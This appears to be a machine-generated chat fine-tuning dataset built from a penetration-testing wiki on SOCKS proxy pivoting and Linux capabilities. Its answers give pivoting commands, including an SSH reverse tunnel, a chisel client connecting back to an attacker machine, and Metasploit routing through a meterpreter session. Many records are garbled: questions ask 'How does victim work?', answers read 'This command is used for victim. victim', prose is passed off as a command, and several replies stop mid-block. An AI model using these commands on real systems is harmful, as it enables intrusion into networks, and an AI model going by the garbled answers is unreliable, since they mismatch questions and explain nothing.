🛠️ SOCKS proxy - Basic server setup"}, {"role": "assistant", "content": "> [!TIP]\n> While setting up port forwarding, it's important to remember that non-admin users can only open ports above 1024.\n\nIn practice, there are many ways to turn a controlled machine into a SOCKS proxy server.\n\n::: tabs\n\n=== SSH commands\n\nOne of the most easy is by relying on SSH, however, it requires to have an SSH server running on the controlled machine and a valid account. The tester needs to open an SSH connection to the machine that should be turned into a SOCKS proxy, and supply the -D option along with the port to use for tunneling. The command can also be used with -N option to make sure no command gets executed after the SSH session is opened.\n\n``bash\nssh -N -D $PORT $CONTROLLED_TARGET\n`\n\nOnce the ssh command exits successful (or once a session opens) the tester can then proceed to the usage part. \n\nA reverse dynamic port forwarding can be also put in place to tunnel a machine's traffic through the attacker machine. It is implemented entirely in the client (i.e. the server does not need to be updated) (since OpenSSH 7.6).\n\n`bash\nssh -N -R $PORT $CONTROLLED_TARGET\n`\n\n=== Chisel\n\nChisel is a standalone binary for pivoting on Linux and Windows systems.\n\nWorking on a server/client, the binary simply needs to be uploaded on the victim host and executed as server on the attacker machine.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 🛠️ SOCKS proxy - Basic server setup", "response": "> [!TIP]\n> While setting up port forwarding, it's important to remember that non-admin users can only open ports above 1024.\n\nIn practice, there are many ways to turn a controlled machine into a SOCKS proxy server.\n\n::: tabs\n\n=== SSH commands\n\nOne of the most easy is by relying on SSH, however, it requires to have an SSH server running on the controlled machine and a valid account. The tester needs to open an SSH connection to the machine that should be turned into a SOCKS proxy, and supply the -D option along with the port to use for tunneling. The command can also be used with -N option to make sure no command gets executed after the SSH session is opened.\n\n``bash\nssh -N -D $PORT $CONTROLLED_TARGET\n`\n\nOnce the ssh command exits successful (or once a session opens) the tester can then proceed to the usage part. \n\nA reverse dynamic port forwarding can be also put in place to tunnel a machine's traffic through the attacker machine. It is implemented entirely in the client (i.e. the server does not need to be updated) (since OpenSSH 7.6).\n\n`bash\nssh -N -R $PORT $CONTROLLED_TARGET\n`\n\n=== Chisel\n\nChisel is a standalone binary for pivoting on Linux and Windows systems.\n\nWorking on a server/client, the binary simply needs to be uploaded on the victim host and executed as server on the attacker machine.\n\n``bash", "metadata": {"corpus_index": 1399, "category": "network", "source_file": "docs/src/infra/pivoting/socks-proxy.md", "page_title": "🛠️ SOCKS proxy", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the ssh command to 🛠️ socks proxy - basic server setup"}, {"role": "assistant", "content": "ssh -N -D $PORT $CONTROLLED_TARGET"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the ssh command to 🛠️ socks proxy - basic server setup", "response": "ssh -N -D $PORT $CONTROLLED_TARGET", "metadata": {"corpus_index": 1400, "category": "network", "source_file": "docs/src/infra/pivoting/socks-proxy.md", "page_title": "🛠️ SOCKS proxy", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ssh"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 🛠️ SOCKS proxy - Basic server setup"}, {"role": "assistant", "content": "ssh -N -D $PORT $CONTROLLED_TARGET"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 🛠️ SOCKS proxy - Basic server setup", "response": "ssh -N -D $PORT $CONTROLLED_TARGET", "metadata": {"corpus_index": 1400, "category": "network", "source_file": "docs/src/infra/pivoting/socks-proxy.md", "page_title": "🛠️ SOCKS proxy", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `ssh -N -D $PORT $CONTROLLED_TARGET`?"}, {"role": "assistant", "content": "This command is used for 🛠️ socks proxy - basic server setup. Basic server setup"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `ssh -N -D $PORT $CONTROLLED_TARGET`?", "response": "This command is used for 🛠️ socks proxy - basic server setup. Basic server setup", "metadata": {"corpus_index": 1400, "category": "network", "source_file": "docs/src/infra/pivoting/socks-proxy.md", "page_title": "🛠️ SOCKS proxy", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the ssh command to 🛠️ socks proxy - basic server setup"}, {"role": "assistant", "content": "ssh -N -R $PORT $CONTROLLED_TARGET"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the ssh command to 🛠️ socks proxy - basic server setup", "response": "ssh -N -R $PORT $CONTROLLED_TARGET", "metadata": {"corpus_index": 1401, "category": "network", "source_file": "docs/src/infra/pivoting/socks-proxy.md", "page_title": "🛠️ SOCKS proxy", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ssh"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ SOCKS proxy - Basic server setup"}, {"role": "assistant", "content": "ssh -N -R $PORT $CONTROLLED_TARGET"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ SOCKS proxy - Basic server setup", "response": "ssh -N -R $PORT $CONTROLLED_TARGET", "metadata": {"corpus_index": 1401, "category": "network", "source_file": "docs/src/infra/pivoting/socks-proxy.md", "page_title": "🛠️ SOCKS proxy", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `ssh -N -R $PORT $CONTROLLED_TARGET`?"}, {"role": "assistant", "content": "This command is used for 🛠️ socks proxy - basic server setup. Basic server setup"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `ssh -N -R $PORT $CONTROLLED_TARGET`?", "response": "This command is used for 🛠️ socks proxy - basic server setup. Basic server setup", "metadata": {"corpus_index": 1401, "category": "network", "source_file": "docs/src/infra/pivoting/socks-proxy.md", "page_title": "🛠️ SOCKS proxy", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does victim work?"}, {"role": "assistant", "content": "chisel client $ATTACKER_MACHINE_IP:$ATTACKER_MACHINE_PORT R:socks\n``\n\n=== SSH config\n\n=== Metasploit\n\nA meterpreter session can be taken advantage of by setting up a SOCKS proxy with the appropriate module.\n\nThe first steps consists in creating a route, from a meterpreter shell to the target\n\n`bash\nmeterpreter > run autoroute -s 10.11.1.0/24\n`\n\nThe session can then be put in background and, the SOCKS server can be created.\n\n`bash\nmsf > use auxiliary/server/socks_proxy\nmsf > set SRVPORT $PORT\nmsf > set VERSION 4a\nmsf > run\n``\n\n=== Cobalt Strike\n\n=== proxychains\n\n=== 3proxy\n\n=== plink\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does victim work?", "response": "chisel client $ATTACKER_MACHINE_IP:$ATTACKER_MACHINE_PORT R:socks\n``\n\n=== SSH config\n\n=== Metasploit\n\nA meterpreter session can be taken advantage of by setting up a SOCKS proxy with the appropriate module.\n\nThe first steps consists in creating a route, from a meterpreter shell to the target\n\n`bash\nmeterpreter > run autoroute -s 10.11.1.0/24\n`\n\nThe session can then be put in background and, the SOCKS server can be created.\n\n`bash\nmsf > use auxiliary/server/socks_proxy\nmsf > set SRVPORT $PORT\nmsf > set VERSION 4a\nmsf > run\n``\n\n=== Cobalt Strike\n\n=== proxychains\n\n=== 3proxy\n\n=== plink\n\n:::", "metadata": {"corpus_index": 1402, "category": "network", "source_file": "docs/src/infra/pivoting/socks-proxy.md", "page_title": "🛠️ SOCKS proxy", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do victim"}, {"role": "assistant", "content": "chisel client $ATTACKER_MACHINE_IP:$ATTACKER_MACHINE_PORT R:socks\n``\n\n=== SSH config\n\n=== Metasploit\n\nA meterpreter session can be taken advantage of by setting up a SOCKS proxy with the appropriate module.\n\nThe first steps consists in creating a route, from a meterpreter shell to the target\n\n`bash\nmeterpreter > run autoroute -s 10.11.1.0/24\n`\n\nThe session can then be put in background and, the SOCKS server can be created.\n\n`bash\nmsf > use auxiliary/server/socks_proxy\nmsf > set SRVPORT $PORT\nmsf > set VERSION 4a\nmsf > run\n``\n\n=== Cobalt Strike\n\n=== proxychains\n\n=== 3proxy\n\n=== plink\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do victim", "response": "chisel client $ATTACKER_MACHINE_IP:$ATTACKER_MACHINE_PORT R:socks\n``\n\n=== SSH config\n\n=== Metasploit\n\nA meterpreter session can be taken advantage of by setting up a SOCKS proxy with the appropriate module.\n\nThe first steps consists in creating a route, from a meterpreter shell to the target\n\n`bash\nmeterpreter > run autoroute -s 10.11.1.0/24\n`\n\nThe session can then be put in background and, the SOCKS server can be created.\n\n`bash\nmsf > use auxiliary/server/socks_proxy\nmsf > set SRVPORT $PORT\nmsf > set VERSION 4a\nmsf > run\n``\n\n=== Cobalt Strike\n\n=== proxychains\n\n=== 3proxy\n\n=== plink\n\n:::", "metadata": {"corpus_index": 1402, "category": "network", "source_file": "docs/src/infra/pivoting/socks-proxy.md", "page_title": "🛠️ SOCKS proxy", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute victim?"}, {"role": "assistant", "content": "=== SSH config\n\n\n\n\n=== Metasploit\n\nA meterpreter session can be taken advantage of by setting up a SOCKS proxy with the appropriate module.\n\nThe first steps consists in creating a route, from a meterpreter shell to the target"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute victim?", "response": "=== SSH config\n\n\n\n\n=== Metasploit\n\nA meterpreter session can be taken advantage of by setting up a SOCKS proxy with the appropriate module.\n\nThe first steps consists in creating a route, from a meterpreter shell to the target", "metadata": {"corpus_index": 1403, "category": "network", "source_file": "docs/src/infra/pivoting/socks-proxy.md", "page_title": "🛠️ SOCKS proxy", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== SSH config`?"}, {"role": "assistant", "content": "This command is used for victim. victim"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== SSH config`?", "response": "This command is used for victim. victim", "metadata": {"corpus_index": 1403, "category": "network", "source_file": "docs/src/infra/pivoting/socks-proxy.md", "page_title": "🛠️ SOCKS proxy", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the The command to victim"}, {"role": "assistant", "content": "The session can then be put in background and, the SOCKS server can be created."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the The command to victim", "response": "The session can then be put in background and, the SOCKS server can be created.", "metadata": {"corpus_index": 1404, "category": "network", "source_file": "docs/src/infra/pivoting/socks-proxy.md", "page_title": "🛠️ SOCKS proxy", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "The"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute victim?"}, {"role": "assistant", "content": "The session can then be put in background and, the SOCKS server can be created."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute victim?", "response": "The session can then be put in background and, the SOCKS server can be created.", "metadata": {"corpus_index": 1404, "category": "network", "source_file": "docs/src/infra/pivoting/socks-proxy.md", "page_title": "🛠️ SOCKS proxy", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `The session can then be put in background and, the SOCKS server can be created.`?"}, {"role": "assistant", "content": "This command is used for victim. victim"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `The session can then be put in background and, the SOCKS server can be created.`?", "response": "This command is used for victim. victim", "metadata": {"corpus_index": 1404, "category": "network", "source_file": "docs/src/infra/pivoting/socks-proxy.md", "page_title": "🛠️ SOCKS proxy", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 🛠️ SOCKS proxy - Basic client usage"}, {"role": "assistant", "content": "Once the SOCKS proxy server is set up, network traffic can be tunneled through with proxychains-ng (C), a tool still maintained and more advanced based on the original proxychains (that is not maintained anymore). The port in use by the SOCKS proxy should be supplied in the configuration file (/etc/proxychains.conf) like in the following examples.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 🛠️ SOCKS proxy - Basic client usage", "response": "Once the SOCKS proxy server is set up, network traffic can be tunneled through with proxychains-ng (C), a tool still maintained and more advanced based on the original proxychains (that is not maintained anymore). The port in use by the SOCKS proxy should be supplied in the configuration file (/etc/proxychains.conf) like in the following examples.\n\n```bash", "metadata": {"corpus_index": 1405, "category": "network", "source_file": "docs/src/infra/pivoting/socks-proxy.md", "page_title": "🛠️ SOCKS proxy", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ SOCKS proxy - Basic client usage"}, {"role": "assistant", "content": "Once the SOCKS proxy server is set up, network traffic can be tunneled through with proxychains-ng (C), a tool still maintained and more advanced based on the original proxychains (that is not maintained anymore). The port in use by the SOCKS proxy should be supplied in the configuration file (/etc/proxychains.conf) like in the following examples.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ SOCKS proxy - Basic client usage", "response": "Once the SOCKS proxy server is set up, network traffic can be tunneled through with proxychains-ng (C), a tool still maintained and more advanced based on the original proxychains (that is not maintained anymore). The port in use by the SOCKS proxy should be supplied in the configuration file (/etc/proxychains.conf) like in the following examples.\n\n```bash", "metadata": {"corpus_index": 1405, "category": "network", "source_file": "docs/src/infra/pivoting/socks-proxy.md", "page_title": "🛠️ SOCKS proxy", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain type ip port [user pass]"}, {"role": "assistant", "content": "socks5 192.168.67.78 1080 lamer secret\nsocks4 192.168.11.49 1080\nhttp 192.168.89.33 8080 justu hidden\nhttp 192.168.39.93 8080\n```"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain type ip port [user pass]", "response": "socks5 192.168.67.78 1080 lamer secret\nsocks4 192.168.11.49 1080\nhttp 192.168.89.33 8080 justu hidden\nhttp 192.168.39.93 8080\n```", "metadata": {"corpus_index": 1406, "category": "network", "source_file": "docs/src/infra/pivoting/socks-proxy.md", "page_title": "🛠️ SOCKS proxy", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do type ip port [user pass]"}, {"role": "assistant", "content": "socks5 192.168.67.78 1080 lamer secret\nsocks4 192.168.11.49 1080\nhttp 192.168.89.33 8080 justu hidden\nhttp 192.168.39.93 8080\n```"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do type ip port [user pass]", "response": "socks5 192.168.67.78 1080 lamer secret\nsocks4 192.168.11.49 1080\nhttp 192.168.89.33 8080 justu hidden\nhttp 192.168.39.93 8080\n```", "metadata": {"corpus_index": 1406, "category": "network", "source_file": "docs/src/infra/pivoting/socks-proxy.md", "page_title": "🛠️ SOCKS proxy", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is 🛠️ SOCKS proxy - Chaining proxies?"}, {"role": "assistant", "content": "In certain scenarios, SOCKS proxies can be chained. This can easily be used with proxychains. In the following example, SSH is used to turn compromised machines into SOCKS proxy servers.\n\n![](<./assets/Chained dynamic port forwarding diagram.png>)\n\n![](<./assets/Chained dynamic port forwarding commands SSH.png>)\nSetting up the SOCKS proxy servers (with SSH){.caption}\n\n![](<./assets/Chained dynamic port forwarding commands proxychains.png>)\nSetting up the SOCKS proxy client (proxychains){.caption}\n\n![](<./assets/Chained dynamic port forwarding commands SOCKS.png>)\nAttacking the target through the chain of SOCKS proxies{.caption}"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is 🛠️ SOCKS proxy - Chaining proxies?", "response": "In certain scenarios, SOCKS proxies can be chained. This can easily be used with proxychains. In the following example, SSH is used to turn compromised machines into SOCKS proxy servers.\n\n![](<./assets/Chained dynamic port forwarding diagram.png>)\n\n![](<./assets/Chained dynamic port forwarding commands SSH.png>)\nSetting up the SOCKS proxy servers (with SSH){.caption}\n\n![](<./assets/Chained dynamic port forwarding commands proxychains.png>)\nSetting up the SOCKS proxy client (proxychains){.caption}\n\n![](<./assets/Chained dynamic port forwarding commands SOCKS.png>)\nAttacking the target through the chain of SOCKS proxies{.caption}", "metadata": {"corpus_index": 1407, "category": "network", "source_file": "docs/src/infra/pivoting/socks-proxy.md", "page_title": "🛠️ SOCKS proxy", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🛠️ SOCKS proxy - Chaining proxies"}, {"role": "assistant", "content": "In certain scenarios, SOCKS proxies can be chained. This can easily be used with proxychains. In the following example, SSH is used to turn compromised machines into SOCKS proxy servers.\n\n![](<./assets/Chained dynamic port forwarding diagram.png>)\n\n![](<./assets/Chained dynamic port forwarding commands SSH.png>)\nSetting up the SOCKS proxy servers (with SSH){.caption}\n\n![](<./assets/Chained dynamic port forwarding commands proxychains.png>)\nSetting up the SOCKS proxy client (proxychains){.caption}\n\n![](<./assets/Chained dynamic port forwarding commands SOCKS.png>)\nAttacking the target through the chain of SOCKS proxies{.caption}"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🛠️ SOCKS proxy - Chaining proxies", "response": "In certain scenarios, SOCKS proxies can be chained. This can easily be used with proxychains. In the following example, SSH is used to turn compromised machines into SOCKS proxy servers.\n\n![](<./assets/Chained dynamic port forwarding diagram.png>)\n\n![](<./assets/Chained dynamic port forwarding commands SSH.png>)\nSetting up the SOCKS proxy servers (with SSH){.caption}\n\n![](<./assets/Chained dynamic port forwarding commands proxychains.png>)\nSetting up the SOCKS proxy client (proxychains){.caption}\n\n![](<./assets/Chained dynamic port forwarding commands SOCKS.png>)\nAttacking the target through the chain of SOCKS proxies{.caption}", "metadata": {"corpus_index": 1407, "category": "network", "source_file": "docs/src/infra/pivoting/socks-proxy.md", "page_title": "🛠️ SOCKS proxy", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 🛠️ Capabilities - Theory work?"}, {"role": "assistant", "content": "Linux capabilities are a way to improve permission granularity in unix-like systems. It allows to follow the least-privilege principle by defining fine-grained permissions that can be attributed to threads and files. It works by splitting kernel calls in groups of similar functionalities.\n\nBasic processes : Have no capabilities (file access is controlled by traditional file privileges).\n\n(Binary) files : Can have capabilities (filesystem-dependent).\n\nCapabilities are in separated in 5 sets :\n\n| Set | Description |\n| --------------- | ------------------------------------------------------------------------------------------- |\n| Effective set | the set that will be used when doing permission check. |\n| Permitted set | can be moved to effective set by calling capset() |\n| Inheritable set | can be inherited from parent processes, can be moved to effective set by calling capset() |\n| Bounding set | list of all the capabilities a process can ever receive (in its inheritable/permitted sets) |\n| Ambiant set | passed to non-suid files without defined capabilities |"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 🛠️ Capabilities - Theory work?", "response": "Linux capabilities are a way to improve permission granularity in unix-like systems. It allows to follow the least-privilege principle by defining fine-grained permissions that can be attributed to threads and files. It works by splitting kernel calls in groups of similar functionalities.\n\nBasic processes : Have no capabilities (file access is controlled by traditional file privileges).\n\n(Binary) files : Can have capabilities (filesystem-dependent).\n\nCapabilities are in separated in 5 sets :\n\n| Set | Description |\n| --------------- | ------------------------------------------------------------------------------------------- |\n| Effective set | the set that will be used when doing permission check. |\n| Permitted set | can be moved to effective set by calling capset() |\n| Inheritable set | can be inherited from parent processes, can be moved to effective set by calling capset() |\n| Bounding set | list of all the capabilities a process can ever receive (in its inheritable/permitted sets) |\n| Ambiant set | passed to non-suid files without defined capabilities |", "metadata": {"corpus_index": 1408, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/capabilities.md", "page_title": "🛠️ Capabilities", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🛠️ Capabilities - Theory"}, {"role": "assistant", "content": "Linux capabilities are a way to improve permission granularity in unix-like systems. It allows to follow the least-privilege principle by defining fine-grained permissions that can be attributed to threads and files. It works by splitting kernel calls in groups of similar functionalities.\n\nBasic processes : Have no capabilities (file access is controlled by traditional file privileges).\n\n(Binary) files : Can have capabilities (filesystem-dependent).\n\nCapabilities are in separated in 5 sets :\n\n| Set | Description |\n| --------------- | ------------------------------------------------------------------------------------------- |\n| Effective set | the set that will be used when doing permission check. |\n| Permitted set | can be moved to effective set by calling capset() |\n| Inheritable set | can be inherited from parent processes, can be moved to effective set by calling capset() |\n| Bounding set | list of all the capabilities a process can ever receive (in its inheritable/permitted sets) |\n| Ambiant set | passed to non-suid files without defined capabilities |"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🛠️ Capabilities - Theory", "response": "Linux capabilities are a way to improve permission granularity in unix-like systems. It allows to follow the least-privilege principle by defining fine-grained permissions that can be attributed to threads and files. It works by splitting kernel calls in groups of similar functionalities.\n\nBasic processes : Have no capabilities (file access is controlled by traditional file privileges).\n\n(Binary) files : Can have capabilities (filesystem-dependent).\n\nCapabilities are in separated in 5 sets :\n\n| Set | Description |\n| --------------- | ------------------------------------------------------------------------------------------- |\n| Effective set | the set that will be used when doing permission check. |\n| Permitted set | can be moved to effective set by calling capset() |\n| Inheritable set | can be inherited from parent processes, can be moved to effective set by calling capset() |\n| Bounding set | list of all the capabilities a process can ever receive (in its inheritable/permitted sets) |\n| Ambiant set | passed to non-suid files without defined capabilities |", "metadata": {"corpus_index": 1408, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/capabilities.md", "page_title": "🛠️ Capabilities", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 🛠️ Capabilities - Capability inheritance, capability drop"}, {"role": "assistant", "content": "* On fork() call, the child thread will have the same capabilities as the parent thread.\n* capset() syscall allows to\n * drop any capability from any set\n * move capabilities from permitted/inherited sets to effective set\n* If a thread calls execve() on a binary file, its capabilities will be modified following the pattern described in the man pages (see man capabilities).\n\nNon-exhaustive capability list :\n\n| Capability | Description |\n| ----------------------- | -------------------------------------------------- |\n| CAP_AUDIT_CONTROL | Toggle kernel auditing |\n| CAP_AUDIT_WRITE | Write to kernel audit log |\n| CAP_CHOWN | Change file owners |\n| CAP_SETUID/CAP_SETGID | Change UID/GID |\n| CAP_NET_RAW | Open raw and packet sockets |\n| CAP_NET_BIND_SERVICE | Bind a socket to Internet domain privileged ports |"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 🛠️ Capabilities - Capability inheritance, capability drop", "response": "* On fork() call, the child thread will have the same capabilities as the parent thread.\n* capset() syscall allows to\n * drop any capability from any set\n * move capabilities from permitted/inherited sets to effective set\n* If a thread calls execve() on a binary file, its capabilities will be modified following the pattern described in the man pages (see man capabilities).\n\nNon-exhaustive capability list :\n\n| Capability | Description |\n| ----------------------- | -------------------------------------------------- |\n| CAP_AUDIT_CONTROL | Toggle kernel auditing |\n| CAP_AUDIT_WRITE | Write to kernel audit log |\n| CAP_CHOWN | Change file owners |\n| CAP_SETUID/CAP_SETGID | Change UID/GID |\n| CAP_NET_RAW | Open raw and packet sockets |\n| CAP_NET_BIND_SERVICE | Bind a socket to Internet domain privileged ports |", "metadata": {"corpus_index": 1409, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/capabilities.md", "page_title": "🛠️ Capabilities", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 🛠️ Capabilities - Capability inheritance, capability drop"}, {"role": "assistant", "content": "* On fork() call, the child thread will have the same capabilities as the parent thread.\n* capset() syscall allows to\n * drop 